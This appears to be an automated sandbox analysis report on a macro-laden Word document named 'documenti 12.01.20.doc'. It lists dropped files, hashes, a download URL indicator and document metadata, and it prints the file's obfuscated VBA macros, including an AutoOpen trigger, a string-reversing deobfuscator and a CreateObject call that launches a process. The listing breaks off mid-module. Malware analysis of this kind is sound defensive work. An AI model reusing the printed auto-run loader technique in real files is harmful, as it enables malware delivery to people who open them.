                                                                                                                                                                                            SHA-512:6FD2E6037C25B4EC5D091B9E2C3F2E9EC04FC3A59AFD79D980ED0E11FFEEFBA18EA535B1C0443A01BC50C5AED4C4F1150B0487B89CE35B2B440D323B40592B28
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                            Preview: ....../.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{CE8E963C-75E4-48F8-AAD8-BF6FA61F3A31}.tmp
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1024
                                                                                                                                                                                            Entropy (8bit):0.05390218305374581
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                                                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\xspcd2[1].htm
                                                                                                                                                                                            Process:C:\Users\Public\ms.com
                                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):205
                                                                                                                                                                                            Entropy (8bit):5.155240244937957
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3RSG8KCezocKqD:J0+oxBeRmR9etdzRxgzez1T
                                                                                                                                                                                            MD5:6C598B85477C948D2A6C50AB26631415
                                                                                                                                                                                            SHA1:429CE2C54B01450B0250D423F08886A0F6B567DB
                                                                                                                                                                                            SHA-256:04F87DABEBF8EF014741C17361A203E1DA743BA43AF231D9B8DC02DEBE9E6FC4
                                                                                                                                                                                            SHA-512:9C5D564EA1CA2842FB8667C31E8A5CCB07A05073DB509BABF9EA93425B9A344609928582A41CC7DDDAF2A068BF5CBE579F88F8EC8FC3ED4EAC6B796A387C73EA
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            IE Cache URL:http://nfj254aim.com/analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rwwHf1xOO/7n6dDzF/xspcd2?RltAN=vsETwS&G_=Ro_LgyQulrPjxaAj&wixw=XYJCRUJhgYHPY&bkUOD=AXjbvUQDbTcWkz
                                                                                                                                                                                            Preview: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "xspcd2" was not found on this server.</p>.</body></html>.
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\temp.tmp
                                                                                                                                                                                            Process:C:\Users\Public\ms.com
                                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):205
                                                                                                                                                                                            Entropy (8bit):5.155240244937957
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3RSG8KCezocKqD:J0+oxBeRmR9etdzRxgzez1T
                                                                                                                                                                                            MD5:6C598B85477C948D2A6C50AB26631415
                                                                                                                                                                                            SHA1:429CE2C54B01450B0250D423F08886A0F6B567DB
                                                                                                                                                                                            SHA-256:04F87DABEBF8EF014741C17361A203E1DA743BA43AF231D9B8DC02DEBE9E6FC4
                                                                                                                                                                                            SHA-512:9C5D564EA1CA2842FB8667C31E8A5CCB07A05073DB509BABF9EA93425B9A344609928582A41CC7DDDAF2A068BF5CBE579F88F8EC8FC3ED4EAC6B796A387C73EA
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Preview: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "xspcd2" was not found on this server.</p>.</body></html>.
                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\documenti 12.01.20.doc.LNK
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:44 2020, mtime=Thu Dec 3 17:12:12 2020, atime=Thu Dec 3 17:12:09 2020, length=88302, window=hide
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2190
                                                                                                                                                                                            Entropy (8bit):4.712055572834122
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:8xJvKgz97TLn0AWHlHD+C3S7aB6myxJvKgz97TLn0AWHlHD+C3S7aB6m:8vvKarDWHgC3DB6pvvKarDWHgC3DB6
                                                                                                                                                                                            MD5:4E46CCE2B28C2C8F37445649C41C3D13
                                                                                                                                                                                            SHA1:53466F4075B1C2DA347CAC97D9DF3328475AE4AA
                                                                                                                                                                                            SHA-256:51E4ACCBF645FBA5364F0778E421EB5860A68FC62E0445581E8A622806CCBC7D
                                                                                                                                                                                            SHA-512:CD886689C52BC3F75ADAE18F4005735E8B3F06C265D862378BDAB418ED36ADE3FA1859DCAD9C26938B52AB170CC4D9B5370135630EE6864A26DF7E20F188E9C8
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Preview: L..................F.... ...)...:................X...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...Q{.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qxx..user.<.......Ny..Q{......S........................h.a.r.d.z.....~.1.....>Qyx..Desktop.h.......Ny..Q|......Y..............>.....3...D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....z.2..X...Q.. .DOCUME~1.DOC..^......>Qwx.Q......h.....................8./.d.o.c.u.m.e.n.t.i. .1.2...0.1...2.0...d.o.c.......\...............-.......[...........>.S......C:\Users\user\Desktop\documenti 12.01.20.doc..-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.i. .1.2...0.1...2.0...d.o.c.........:..,.LB.)...As...`.......X.......707748...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.
                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):104
                                                                                                                                                                                            Entropy (8bit):4.257252520997243
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:M18H9LRBa9CZELRBa9CmX18H9LRBa9Cv:M+H9LCgELC2H9LCs
                                                                                                                                                                                            MD5:E4D38C0BB0C8C137A27C95905AF5428E
                                                                                                                                                                                            SHA1:8D6D1A7BD1F255BE9B0F781D48887D9FFAC1BE48
                                                                                                                                                                                            SHA-256:461FC19670225BA840A06E93B71E3170F24C1B0C0362756ADABA3389BD5D31C5
                                                                                                                                                                                            SHA-512:89E37B3E835960A39E17FFEF53755EFB4309DE3F8F93FBF8A1381A2E1DCC27AB8AAF7F5C902177EBEBFFBB95A0B7D3679DD3853975331DDA6B1D49F36A1C692B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: [doc]..documenti 12.01.20.doc.LNK=0..documenti 12.01.20.doc.LNK=0..[doc]..documenti 12.01.20.doc.LNK=0..
                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):162
                                                                                                                                                                                            Entropy (8bit):2.270627014481718
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Rl/ZdXmxoYlqKKhlLlFlqKO83X/tln:RtZVmxQ5QO
                                                                                                                                                                                            MD5:91C0013827A6C6DC8AAAE35D0CD89DC6
                                                                                                                                                                                            SHA1:118F5DE34C62F8B7A3117BD1BDCCC30DDA804688
                                                                                                                                                                                            SHA-256:EAE73803990EB17F35470ED74A38A013986DF7D071BF65FECC8E002616A1EFB8
                                                                                                                                                                                            SHA-512:40A7A76D64B90F0FBFFA5F4C7F84031FF8CD2AE102760E54A6837909D34A6C076EC34E8E06C255590CBF7F5F6E1F1E2A40F2496BB034E5B779EBDAF9462E2113
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: .pratesh................................................p.r.a.t.e.s.h.........#...............T.......6C....../...............$.......6C......+...................
                                                                                                                                                                                            C:\Users\user\Desktop\~$cumenti 12.01.20.doc
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):162
                                                                                                                                                                                            Entropy (8bit):2.270627014481718
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Rl/ZdXmxoYlqKKhlLlFlqKO83X/tln:RtZVmxQ5QO
                                                                                                                                                                                            MD5:91C0013827A6C6DC8AAAE35D0CD89DC6
                                                                                                                                                                                            SHA1:118F5DE34C62F8B7A3117BD1BDCCC30DDA804688
                                                                                                                                                                                            SHA-256:EAE73803990EB17F35470ED74A38A013986DF7D071BF65FECC8E002616A1EFB8
                                                                                                                                                                                            SHA-512:40A7A76D64B90F0FBFFA5F4C7F84031FF8CD2AE102760E54A6837909D34A6C076EC34E8E06C255590CBF7F5F6E1F1E2A40F2496BB034E5B779EBDAF9462E2113
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: .pratesh................................................p.r.a.t.e.s.h.........#...............T.......6C....../...............$.......6C......+...................

                                                                                                                                                                                            Static File Info

                                                                                                                                                                                            General

                                                                                                                                                                                            File type:Microsoft Word 2007+
                                                                                                                                                                                            Entropy (8bit):7.894769517768764
                                                                                                                                                                                            TrID:
                                                                                                                                                                                            • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
                                                                                                                                                                                            • Word Microsoft Office Open XML Format document (49504/1) 32.35%
                                                                                                                                                                                            • Word Microsoft Office Open XML Format document (43504/1) 28.43%
                                                                                                                                                                                            • ZIP compressed archive (8000/1) 5.23%
                                                                                                                                                                                            File name:documenti 12.01.20.doc
                                                                                                                                                                                            File size:93665
                                                                                                                                                                                            MD5:f530de77053a5c25a94f930bb954bcf8
                                                                                                                                                                                            SHA1:46cbf6e7a7ad04e3586c88a7a0d2cbcb141c3ec4
                                                                                                                                                                                            SHA256:1e70cc7a76bf59a5b559e496a0e83f91e13526533c89f001619ca70324ebfd82
                                                                                                                                                                                            SHA512:f35b4d0cf4d0665117f58792a4d0fe51f13210921c1ac9d715160a4f9708e09817c6f0ab65e2c37c493a22d41fdacaaba1775fb8cc205b9d3e4855258892f916
                                                                                                                                                                                            SSDEEP:1536:A/rBcK6fNcSI7O8hRe7Il+Oy4wUOAL2wPbnQ/Tz6CaC/B2RrNbSxQml:w6lfNu/Q7Y9wkFncTZB2RrN9S
                                                                                                                                                                                            File Content Preview:PK..........!.[...............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                                                            File Icon

                                                                                                                                                                                            Icon Hash:74f4c4c6c1cac4d8

                                                                                                                                                                                            Static OLE Info

                                                                                                                                                                                            General

                                                                                                                                                                                            Document Type:OpenXML
                                                                                                                                                                                            Number of OLE Files:1

                                                                                                                                                                                            OLE File "/opt/package/joesandbox/database/analysis/326338/sample/documenti 12.01.20.doc"

                                                                                                                                                                                            Indicators

                                                                                                                                                                                            Has Summary Info:False
                                                                                                                                                                                            Application Name:unknown
                                                                                                                                                                                            Encrypted Document:False
                                                                                                                                                                                            Contains Word Document Stream:
                                                                                                                                                                                            Contains Workbook/Book Stream:
                                                                                                                                                                                            Contains PowerPoint Document Stream:
                                                                                                                                                                                            Contains Visio Document Stream:
                                                                                                                                                                                            Contains ObjectPool Stream:
                                                                                                                                                                                            Flash Objects Count:
                                                                                                                                                                                            Contains VBA Macros:True

                                                                                                                                                                                            Summary

                                                                                                                                                                                            Template:Normal.dotm
                                                                                                                                                                                            Total Edit Time:0
                                                                                                                                                                                            Number of Pages:1
                                                                                                                                                                                            Number of Words:0
                                                                                                                                                                                            Number of Characters:0
                                                                                                                                                                                            Creating Application:Microsoft Office Word
                                                                                                                                                                                            Security:0

                                                                                                                                                                                            Document Summary

                                                                                                                                                                                            Number of Lines:3
                                                                                                                                                                                            Number of Paragraphs:0
                                                                                                                                                                                            Thumbnail Scaling Desired:false
                                                                                                                                                                                            Company:
                                                                                                                                                                                            Contains Dirty Links:false
                                                                                                                                                                                            Shared Document:false
                                                                                                                                                                                            Changed Hyperlinks:false
                                                                                                                                                                                            Application Version:16.0000

                                                                                                                                                                                            Streams with VBA

                                                                                                                                                                                            VBA File Name: ThisDocument.cls, Stream Size: 1127
                                                                                                                                                                                            General
                                                                                                                                                                                            Stream Path:VBA/ThisDocument
                                                                                                                                                                                            VBA File Name:ThisDocument.cls
                                                                                                                                                                                            Stream Size:1127
                                                                                                                                                                                            Data ASCII:. . . . . . . . . 4 . . . . . . . . . . . b . . . p . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . s . . : . . \\ L . . # Y * . . . . . g ~ . . L . o . . . . . . . . . . . . . . . . . . . . . . . . . . ! } . . . . u D . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . ! } . . . . u D . 1 . . . . . . s . . : . . \\ L . . # Y * . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                            Data Raw:01 16 03 00 06 00 01 00 00 34 03 00 00 e4 00 00 00 ea 01 00 00 62 03 00 00 70 03 00 00 c4 03 00 00 00 00 00 00 01 00 00 00 0e 35 d7 f8 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 73 04 ec 3a 99 d0 5c 4c bb d7 23 59 2a 88 09 7f 14 fb 67 20 7e 8f de 4c 81 6f 96 90 b4 fc f3 9f 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                                                            VBA Code Keywords

                                                                                                                                                                                            Keyword
                                                                                                                                                                                            False
                                                                                                                                                                                            VB_Exposed
                                                                                                                                                                                            Attribute
                                                                                                                                                                                            VB_Creatable
                                                                                                                                                                                            VB_Name
                                                                                                                                                                                            VB_PredeclaredId
                                                                                                                                                                                            VB_GlobalNameSpace
                                                                                                                                                                                            VB_Base
                                                                                                                                                                                            VB_Customizable
                                                                                                                                                                                            VB_TemplateDerived
                                                                                                                                                                                            "ThisDocument"
                                                                                                                                                                                            VBA Code
                                                                                                                                                                                            Attribute VB_Name = "ThisDocument"
                                                                                                                                                                                            Attribute VB_Base = "1Normal.ThisDocument"
                                                                                                                                                                                            Attribute VB_GlobalNameSpace = False
                                                                                                                                                                                            Attribute VB_Creatable = False
                                                                                                                                                                                            Attribute VB_PredeclaredId = True
                                                                                                                                                                                            Attribute VB_Exposed = True
                                                                                                                                                                                            Attribute VB_TemplateDerived = True
                                                                                                                                                                                            Attribute VB_Customizable = True
                                                                                                                                                                                            VBA File Name: a7A5m.bas, Stream Size: 5178
                                                                                                                                                                                            General
                                                                                                                                                                                            Stream Path:VBA/a7A5m
                                                                                                                                                                                            VBA File Name:a7A5m.bas
                                                                                                                                                                                            Stream Size:5178
                                                                                                                                                                                            Data ASCII:. . . . . . . . . j . . . . . . . . . . . . . . . q . . . ] . . . . . . . . . . . . 5 > Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                            Data Raw:01 16 03 00 00 f0 00 00 00 6a 03 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 71 03 00 00 5d 0e 00 00 00 00 00 00 01 00 00 00 0e 35 3e 51 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                                                            VBA Code Keywords

                                                                                                                                                                                            Keyword
                                                                                                                                                                                            joins
                                                                                                                                                                                            effigy
                                                                                                                                                                                            photo
                                                                                                                                                                                            maidenhead
                                                                                                                                                                                            torah
                                                                                                                                                                                            imprint
                                                                                                                                                                                            co-operative
                                                                                                                                                                                            unfavorable
                                                                                                                                                                                            Collects
                                                                                                                                                                                            Public
                                                                                                                                                                                            Diagram
                                                                                                                                                                                            aSGxU
                                                                                                                                                                                            Makeup
                                                                                                                                                                                            father
                                                                                                                                                                                            abhorred
                                                                                                                                                                                            controls
                                                                                                                                                                                            Cutting
                                                                                                                                                                                            unpropitious
                                                                                                                                                                                            minerva
                                                                                                                                                                                            Training
                                                                                                                                                                                            Adventures
                                                                                                                                                                                            unveil
                                                                                                                                                                                            Mysimon
                                                                                                                                                                                            Replace(aPENSZ,
                                                                                                                                                                                            slanderous
                                                                                                                                                                                            webcast
                                                                                                                                                                                            savoury
                                                                                                                                                                                            nucleus
                                                                                                                                                                                            liberia
                                                                                                                                                                                            footstool
                                                                                                                                                                                            Adroit
                                                                                                                                                                                            nutmeg
                                                                                                                                                                                            greenish
                                                                                                                                                                                            inter
                                                                                                                                                                                            adHaPl
                                                                                                                                                                                            Hallow
                                                                                                                                                                                            warner
                                                                                                                                                                                            manger
                                                                                                                                                                                            ethical
                                                                                                                                                                                            Since
                                                                                                                                                                                            pickled
                                                                                                                                                                                            Routing
                                                                                                                                                                                            Sniff
                                                                                                                                                                                            Giants
                                                                                                                                                                                            Nickel
                                                                                                                                                                                            seventy-four
                                                                                                                                                                                            fellowship
                                                                                                                                                                                            shadow
                                                                                                                                                                                            Maudlin
                                                                                                                                                                                            stefan
                                                                                                                                                                                            Tribal
                                                                                                                                                                                            tabooed
                                                                                                                                                                                            akSqK(aPENSZ)
                                                                                                                                                                                            expire
                                                                                                                                                                                            along
                                                                                                                                                                                            vaccine
                                                                                                                                                                                            reaction
                                                                                                                                                                                            Rancid
                                                                                                                                                                                            patricia
                                                                                                                                                                                            lackey
                                                                                                                                                                                            coxcomb
                                                                                                                                                                                            Workflow
                                                                                                                                                                                            axIuO
                                                                                                                                                                                            succeed
                                                                                                                                                                                            daisy
                                                                                                                                                                                            syria
                                                                                                                                                                                            Receptacle
                                                                                                                                                                                            Defraud
                                                                                                                                                                                            Knowledge
                                                                                                                                                                                            Contacts
                                                                                                                                                                                            Sorcery
                                                                                                                                                                                            transit
                                                                                                                                                                                            undersigned
                                                                                                                                                                                            leniency
                                                                                                                                                                                            sacrilegious
                                                                                                                                                                                            aYKyQ
                                                                                                                                                                                            dearborn
                                                                                                                                                                                            insulation
                                                                                                                                                                                            detecting
                                                                                                                                                                                            cloud
                                                                                                                                                                                            Glucose
                                                                                                                                                                                            willy
                                                                                                                                                                                            wealth
                                                                                                                                                                                            probity
                                                                                                                                                                                            exhort
                                                                                                                                                                                            Accelerated
                                                                                                                                                                                            ballast
                                                                                                                                                                                            Articulated
                                                                                                                                                                                            transverse
                                                                                                                                                                                            azUoN
                                                                                                                                                                                            Outcome
                                                                                                                                                                                            Specifies
                                                                                                                                                                                            graphic
                                                                                                                                                                                            brandishing
                                                                                                                                                                                            Attribute
                                                                                                                                                                                            gamespot
                                                                                                                                                                                            rectangular
                                                                                                                                                                                            patients
                                                                                                                                                                                            awAlq()
                                                                                                                                                                                            tumults
                                                                                                                                                                                            Enemies
                                                                                                                                                                                            Basketball
                                                                                                                                                                                            VB_Name
                                                                                                                                                                                            Gloating
                                                                                                                                                                                            (axSiN)
                                                                                                                                                                                            Issue
                                                                                                                                                                                            counterfeit
                                                                                                                                                                                            Function
                                                                                                                                                                                            Retrospect
                                                                                                                                                                                            unadulterated
                                                                                                                                                                                            comfort
                                                                                                                                                                                            hybrid
                                                                                                                                                                                            Munich
                                                                                                                                                                                            brandon
                                                                                                                                                                                            delay
                                                                                                                                                                                            located
                                                                                                                                                                                            actors
                                                                                                                                                                                            commentary
                                                                                                                                                                                            akSqK
                                                                                                                                                                                            cubic
                                                                                                                                                                                            stacy
                                                                                                                                                                                            photographers
                                                                                                                                                                                            Airport
                                                                                                                                                                                            characters
                                                                                                                                                                                            dappled
                                                                                                                                                                                            chris
                                                                                                                                                                                            mangrove
                                                                                                                                                                                            knack
                                                                                                                                                                                            Generates
                                                                                                                                                                                            statute
                                                                                                                                                                                            Attorney
                                                                                                                                                                                            coupling
                                                                                                                                                                                            navel
                                                                                                                                                                                            Pyramid
                                                                                                                                                                                            steady
                                                                                                                                                                                            bakery
                                                                                                                                                                                            Boolean
                                                                                                                                                                                            Terrace
                                                                                                                                                                                            Verzeichnis
                                                                                                                                                                                            turnpike
                                                                                                                                                                                            VBA Code
                                                                                                                                                                                            Attribute VB_Name = "a7A5m"
                                                                                                                                                                                            Function aSGxU(aie8CL)
                                                                                                                                                                                            ' Attorney delay nw ballast
                                                                                                                                                                                            ' Soot tyre counterfeit
                                                                                                                                                                                            ' Collects patients steady
                                                                                                                                                                                            ' Knowledge dappled jvc
                                                                                                                                                                                            ' Basketball effigy ethical expire
                                                                                                                                                                                            ' Outcome imprint characters wc mangrove unfavorable ween
                                                                                                                                                                                            ' Mysimon liberia
                                                                                                                                                                                            ' Accelerated roth cubic daisy unadulterated
                                                                                                                                                                                            ' Wr actors manger
                                                                                                                                                                                            ' Sniff commentary cede
                                                                                                                                                                                            ' Lay abhorred turnpike ag cult
                                                                                                                                                                                            ' Terrace minerva
                                                                                                                                                                                            ' Diagram wealth slanderous mae
                                                                                                                                                                                            ' Boolean greenish along
                                                                                                                                                                                            ' Retrospect located transverse lackey weld
                                                                                                                                                                                            ' Issue savoury bakery syria
                                                                                                                                                                                            ' Giants rectangular spas
                                                                                                                                                                                            ' Cutting
                                                                                                                                                                                            ' Adroit knack arg gone do leniency
                                                                                                                                                                                            ' Contacts goto head sacrilegious
                                                                                                                                                                                            ' Routing chris
                                                                                                                                                                                            ' Airport seventy-four gens cz
                                                                                                                                                                                            ' Gloating photographers statute exhort ir
                                                                                                                                                                                            ' Makeup nutmeg sims coupling reaction roth webcast
                                                                                                                                                                                            ' Suck op. father
                                                                                                                                                                                            ' Glucose unpropitious
                                                                                                                                                                                            ' Flea
                                                                                                                                                                                            ' Maudlin co-operative rib controls
                                                                                                                                                                                            ' Specifies comfort tabooed warner
                                                                                                                                                                                            ' Sorcery succeed po graphic
                                                                                                                                                                                            For a6mGn = Len(aie8CL) To 1 Step -1
                                                                                                                                                                                            azUoN = Mid(aie8CL, a6mGn, 1)
                                                                                                                                                                                            adHaPl = adHaPl & azUoN
                                                                                                                                                                                            Next
                                                                                                                                                                                            aSGxU = adHaPl
                                                                                                                                                                                            End Function
                                                                                                                                                                                            Public Function akSqK(aPENSZ)
                                                                                                                                                                                            akSqK = Replace(aPENSZ, a7odJ, "")
                                                                                                                                                                                            End Function
                                                                                                                                                                                            Sub awAlq()
                                                                                                                                                                                            ' Laud footstool undersigned
                                                                                                                                                                                            ' Tribal joins probity fellowship inter maidenhead
                                                                                                                                                                                            ' Generates
                                                                                                                                                                                            ' Army pup
                                                                                                                                                                                            aYKyQ
                                                                                                                                                                                            ' Verzeichnis
                                                                                                                                                                                            ' Enemies hybrid
                                                                                                                                                                                            ' Adventures torah
                                                                                                                                                                                            ' Foam willy gamespot patricia
                                                                                                                                                                                            axIuO
                                                                                                                                                                                            ' Defraud photo dearborn shadow tumults
                                                                                                                                                                                            ' Rancid kirk knack cloud
                                                                                                                                                                                            ' Bush vaccine insulation
                                                                                                                                                                                            ' Pyramid unveil crew mem brandishing
                                                                                                                                                                                            ' Articulated pickled stacy brandon transit
                                                                                                                                                                                            ' Munich ira coxcomb
                                                                                                                                                                                            ' Nickel stefan
                                                                                                                                                                                            ' Hallow
                                                                                                                                                                                            ' Workflow
                                                                                                                                                                                            ' Training nucleus
                                                                                                                                                                                            ' Receptacle detecting navel
                                                                                                                                                                                            ' Since
                                                                                                                                                                                            agPh8 = akSqK(aSGxU(a3IdJQ))
                                                                                                                                                                                            CreateObject(agPh8).create (axSiN)
                                                                                                                                                                                            End Sub
                                                                                                                                                                                            VBA File Name: aH8xms.bas, Stream Size: 863
                                                                                                                                                                                            General
                                                                                                                                                                                            Stream Path:VBA/aH8xms
                                                                                                                                                                                            VBA File Name:aH8xms.bas
                                                                                                                                                                                            Stream Size:863
                                                                                                                                                                                            Data ASCII:. . . . . . . . . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 . ] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                            Data Raw:01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 11 03 00 00 00 00 00 00 01 00 00 00 0e 35 b2 5d 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                                                            VBA Code Keywords

                                                                                                                                                                                            Keyword
                                                                                                                                                                                            awAlq
                                                                                                                                                                                            Attribute
                                                                                                                                                                                            AutoOpen()
                                                                                                                                                                                            VB_Name
                                                                                                                                                                                            VBA Code
                                                                                                                                                                                            Attribute VB_Name = "aH8xms"
                                                                                                                                                                                            Sub AutoOpen()
                                                                                                                                                                                            awAlq
                                                                                                                                                                                            End Sub
                                                                                                                                                                                            VBA File Name: aIsb7.bas, Stream Size: 5040
                                                                                                                                                                                            General
                                                                                                                                                                                            Stream Path:VBA/aIsb7
                                                                                                                                                                                            VBA File Name:aIsb7.bas
                                                                                                                                                                                            Stream Size:5040
                                                                                                                                                                                            Data ASCII:. . . . . . . . . : . . . . . . . . . . . . . . . A . . . 1 . . . . . . . . . . . . 5 . w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                            Data Raw:01 16 03 00 00 f0 00 00 00 3a 06 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 41 06 00 00 31 0f 00 00 00 00 00 00 01 00 00 00 0e 35 df 77 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                                                            VBA Code Keywords

                                                                                                                                                                                            Keyword
                                                                                                                                                                                            Blackmail
                                                                                                                                                                                            developer
                                                                                                                                                                                            valuation
                                                                                                                                                                                            plume
                                                                                                                                                                                            aMslO(aucpr)
                                                                                                                                                                                            amZcqK
                                                                                                                                                                                            Berkeley
                                                                                                                                                                                            plenipotentiary
                                                                                                                                                                                            translations
